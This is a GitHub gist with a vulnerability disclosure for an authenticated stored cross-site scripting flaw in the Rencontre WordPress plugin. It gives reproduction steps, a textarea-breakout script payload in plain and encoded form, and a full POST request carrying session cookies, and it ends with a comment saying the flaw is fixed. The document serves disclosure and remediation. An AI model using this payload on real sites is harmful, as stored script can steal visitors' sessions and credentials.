Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
# Date: 03/08/2019
# Exploit Author: Sathishshan
# Version: <= 3.1.3
# Vendor Homepage: Recontre
# Software Link:
# Tested on: Ubuntu-server 18.0.* OS
# Category : Webapps
# Description
A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.
# Reproduction Steps:
1. Login in WordPress and go to Plugin page
2. Under the "Framework for the Facebook Like button" there is a text area
3. Enter/paste the payload & save
# POC:
Prameter: facebook
Payload: </textarea></td><script>alert('XSS')</script>//
Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F
# Exploit Request:
POST /wp-admin/admin.php?page=rencontre.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Cookie: wordpress_bcee6f2sd387088d5ea973ea693516cd69e=admin%7C1564998379d%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4dfbf797d1f74eeda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78i7qvm2g4d63sddgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C84170a324458679871685b28dcb147a2e88fdsaae850eb6c5d8bb2ecc1636a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
Upgrade-Insecure-Requests: 1
# Impact:
An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
# Remediation:
Uninstall the plugin until the vulnerability has been fixed by the developer.

This comment has been minimized.

Copy link

@boiteasite boiteasite commented Nov 5, 2019

This is now fixed. Textarea has been removed.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment